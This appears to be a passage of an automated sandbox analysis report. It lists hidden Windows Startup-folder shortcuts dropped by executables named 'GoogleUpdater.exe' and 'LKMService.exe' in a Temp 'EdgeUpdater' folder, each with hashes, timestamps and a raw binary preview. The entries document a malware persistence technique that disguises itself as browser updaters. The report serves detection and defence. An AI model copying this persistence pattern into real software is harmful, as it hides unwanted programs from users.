                                                                                                                                                                                                                                          Preview:L..................F...."...${......B.;..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bcea63d5cf1e40668c910026c61fbbe1.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:23 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958723604792235
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8PsDYlXPXv+RrGgKIj/jiSAzav/42eEFsuqygm:8PsDYlf2Rt7sevgosryg
                                                                                                                                                                                                                                          MD5:7030F59662379CEB9BD0B0F87211CC18
                                                                                                                                                                                                                                          SHA1:D631A517C3265B9B814BFB620A8D01CA2BF90803
                                                                                                                                                                                                                                          SHA-256:9804E24D5FE9B8279F145D4759413C203C80C241992EAAB9ED611B916E3B71D0
                                                                                                                                                                                                                                          SHA-512:55D0BE5B34B9BB7786DC2C0ACACDA2556BF61F51F6756D3C4912AE519F2B999B9CD08DD5748C7DF1D39B9ACC930A6C0B82E2D7E24FCD823C8AE59978132763AE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......g...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bf5e484fccdf4c3a962baa6cdbdb684a.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:10 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.954961798717619
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8V7cDYlXPXv+R2vgKsj/jiSAzav/42eEFsuqygm:8VoDYlf2RP7sevgosryg
                                                                                                                                                                                                                                          MD5:5B04A6F40F7F89DB977B75B5CC027028
                                                                                                                                                                                                                                          SHA1:A841E769738F9962D37CCA7D9C24888FDC1104F8
                                                                                                                                                                                                                                          SHA-256:9F088CB1485F65A09A28DFA21706F2E4901E244D2600DA79CB2460E3F4B481B8
                                                                                                                                                                                                                                          SHA-512:5060B1762D7467293C6094C5268E8230F573018D0E73E695D62EE13328A0067EFBC768CFA49087E70D9C24A01A86F6BF37636175E7709DE6F7EBB9D2B58C86E3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......A(..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYfe..Temp..:......EW<2BYfe....^......................2(.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1dfbca3911145b08091a865bac69e32.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:06 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.965883737306271
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8TsDYlXPXv+RjmPgK+j/jiSAzav/42eEFsuqygm:8TsDYlf2Rjn7sevgosryg
                                                                                                                                                                                                                                          MD5:63E5FD8BBD624EE55F19D6E53FBF98F2
                                                                                                                                                                                                                                          SHA1:56AF1D4B924B129E5CD9BDF3D60D52AE5FD0F30F
                                                                                                                                                                                                                                          SHA-256:D0F9710444AEA726015A45165DEE5ADBB08EAB21CB8242322FC5DC158C121973
                                                                                                                                                                                                                                          SHA-512:18562C91EA9030B20A9359EF13954FB42D7E7205DF6A323E07C1102E45F767B1A77316DE87A3830F16505AB9C0C23895B149FDE8FD03BE0EABC2AC66ACA91596
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......f................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................v...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c5f5c59425a8470e95d441ef95b94f08.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:13 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.96449359887664
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8PsDYlXPXv+RhgK4x8j/jiSAzav/42eEFsuqygm:8PsDYlf2Rqx87sevgosryg
                                                                                                                                                                                                                                          MD5:06C23B9D10D49847624049793C7D57E6
                                                                                                                                                                                                                                          SHA1:4BCCF0BA920AA53F55A6E07B411111675C7E18D2
                                                                                                                                                                                                                                          SHA-256:AF630666F9E9D257155C39FCBB1778AA1052F3EF68C1932BAF61A36541BFF316
                                                                                                                                                                                                                                          SHA-512:EFA88355B147B7E78051E68FD178140F678B56D0BB0C3EDDD4619A8CFCC42A50005A5E972F42D3621C44D4F051F103E1D177C13EEBCC5975BC885FB067492BA5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......k.6..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c735b92f69974d86b917177ddaffade0.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:18 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957124164952258
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8KsDYlXPXv+RkgKJj/jiSAzav/42eEFsuqygm:8KsDYlf2R+7sevgosryg
                                                                                                                                                                                                                                          MD5:2E9E50FD33ADB435A65AA4671077CCD0
                                                                                                                                                                                                                                          SHA1:54A1C1C3334ECD42C78FC110F4F0CC64EF7E0378
                                                                                                                                                                                                                                          SHA-256:B2DFF13D6EE022459A23F683ADEBB4E7D1BDEC0D63F6FDF0668F57D5DB6ED0F6
                                                                                                                                                                                                                                          SHA-512:5519B38ED99C0B47170DC054B2FFAB7CB48792EC63CE1ACA96F8CAD21AFB5C960B7CC10F368DD9211E65F73056C34AF708630C38A4A77CF6AFC9086FAE4B8C03
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................o...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c92e0f63f6584d9f81176fd36293b446.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:52 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.937139766399913
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8v7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8voDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:FCBF3C7120C453DE5BE80C85595C061D
                                                                                                                                                                                                                                          SHA1:E8A29C2680D9E7505586045266BDB2D81584E60E
                                                                                                                                                                                                                                          SHA-256:542E9591D99BC98434E616F04E9CDEB4C1D8D2FFAC226F3D5872363A3F86D15F
                                                                                                                                                                                                                                          SHA-512:8E143FBD8EE33FE25F7AC021ED44B0537FE2D7C11C52C06D32CB181D824684AA66DAE8845B734C0AA6E518CEAC6D215789C326CEAA4AA7E0097E56B15CEC2DFE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......NF..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cc6e27735bba4e3e8a34973f2b1f979b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:24 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.959339597987401
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:85dsDYlXPXv+RjgKqAuj/jiSAzav/42eEFsuqygm:85dsDYlf2Rez7sevgosryg
                                                                                                                                                                                                                                          MD5:91B0826C74EBF0667217FBDA1F5C2B22
                                                                                                                                                                                                                                          SHA1:86CBE15FA96F25039A26A7F5C930BA8B72D6B477
                                                                                                                                                                                                                                          SHA-256:D9A412E6D8C1FB5B2352891F97CA8987BEE962E5F1882BC55ED819267BC171D6
                                                                                                                                                                                                                                          SHA-512:F24B40187146D1D473216DECDDF549ABC80267D0F997E40AF1D51C6FD2C7B126427EF671B46E9FCCE0D55C2FC8FE45014E4F5C1DC95F25C956A3D98AACB87CB8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.....................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYme..Temp..:......EW<2BYme....^.....................~H..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cd5ef6ce168c438996448b48dcaf4d98.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:03 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.946622837336121
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8T7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8ToDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:401C12C8EBBD37757D8F2E3B977908D6
                                                                                                                                                                                                                                          SHA1:9374BF530C170233CA5431CA60CE60FE41775323
                                                                                                                                                                                                                                          SHA-256:C6BB0B39814EFC69FA3D19C98E7B2E843A1AAF661EF5857A55EE288367B582C0
                                                                                                                                                                                                                                          SHA-512:2B848E64EF024C270BE7F32A126E86EAEB1E7AE90E3ED0A96898E5981FD58CB7DF0C74779566A4CE7E64FDE6C0990D1A0BEFFDFB82295C9A63AB47BDB2EB0C79
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......[T..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ce6e443813a54514b9787afeecbaa12b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:14 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.954662920656234
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8c7cDYlXPXv+R+gKjluj/jiSAzav/42eEFsuqygm:8coDYlf2Rglu7sevgosryg
                                                                                                                                                                                                                                          MD5:1A0A4189EA715F6ADECCB0FEC6D7BD75
                                                                                                                                                                                                                                          SHA1:9409C3056665A60EDCD384B3D614FDF42318EE53
                                                                                                                                                                                                                                          SHA-256:80D1314F2E0BC08D7283C07952232EC16EBB2B5580B65A3F5C0FAF1EC2C53CFC
                                                                                                                                                                                                                                          SHA-512:3095E46056E4BB21C5C1A5C8EC338742A24989DEFCED496419BE9DC3D8CEC33F1DBE7488A7CA85707857922F2E99280C32BD921A53C5F1665A49B405F48F35C1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......]..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYhe..Temp..:......EW<2BYhe....^.....................[!..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ce7d7fb0cabe4fd0b1ca071b2f180417.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:05 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.962810097193138
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8+IsDYlXPXv+RlgKJqj/jiSAzav/42eEFsuqygm:8+IsDYlf2R7q7sevgosryg
                                                                                                                                                                                                                                          MD5:586E3C98D856DE3C4222DE36BB8CAA0E
                                                                                                                                                                                                                                          SHA1:B8546058E26CB2EC9F84D79DA81BF86F83A04AED
                                                                                                                                                                                                                                          SHA-256:7EB2E4B9BDAA0F4521AEF1EDA4A9FEECA5D5E3F68193936D5538E0C537994969
                                                                                                                                                                                                                                          SHA-512:C0195877A9AF81540ABBACC8E5AD9790457058411A5E644669724851F6BADC1CC2CF0852F0A8393E6F4BC5A1973F7948CBA4E70C5B9218D79E4621E48080332E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......<.:..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.......................H.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cea5a8b48294490ba1778d45c01931cf.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:20 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958420827597908
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8QCsDYlXPXv+RZHgKBFaj/jiSAzav/42eEFsuqygm:8QCsDYlf2RZC7sevgosryg
                                                                                                                                                                                                                                          MD5:E99B1C27DCD8826410EBCE42ECCE1761
                                                                                                                                                                                                                                          SHA1:27B511196919BD8175547C2CE1C4C0A8C5B2EE43
                                                                                                                                                                                                                                          SHA-256:B214D112320D087A5E69C68F01AB0447E0498B6FDFC4165DEE442A58E63E84B7
                                                                                                                                                                                                                                          SHA-512:ED9472F2F454B433CEE6097EE61A24E8186A64175AB176D6BCC2817205682CD268588A48360DE2CD9FED3D114936A1F30E2E32EC20DB8DAB85AC59587B0EA3B4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
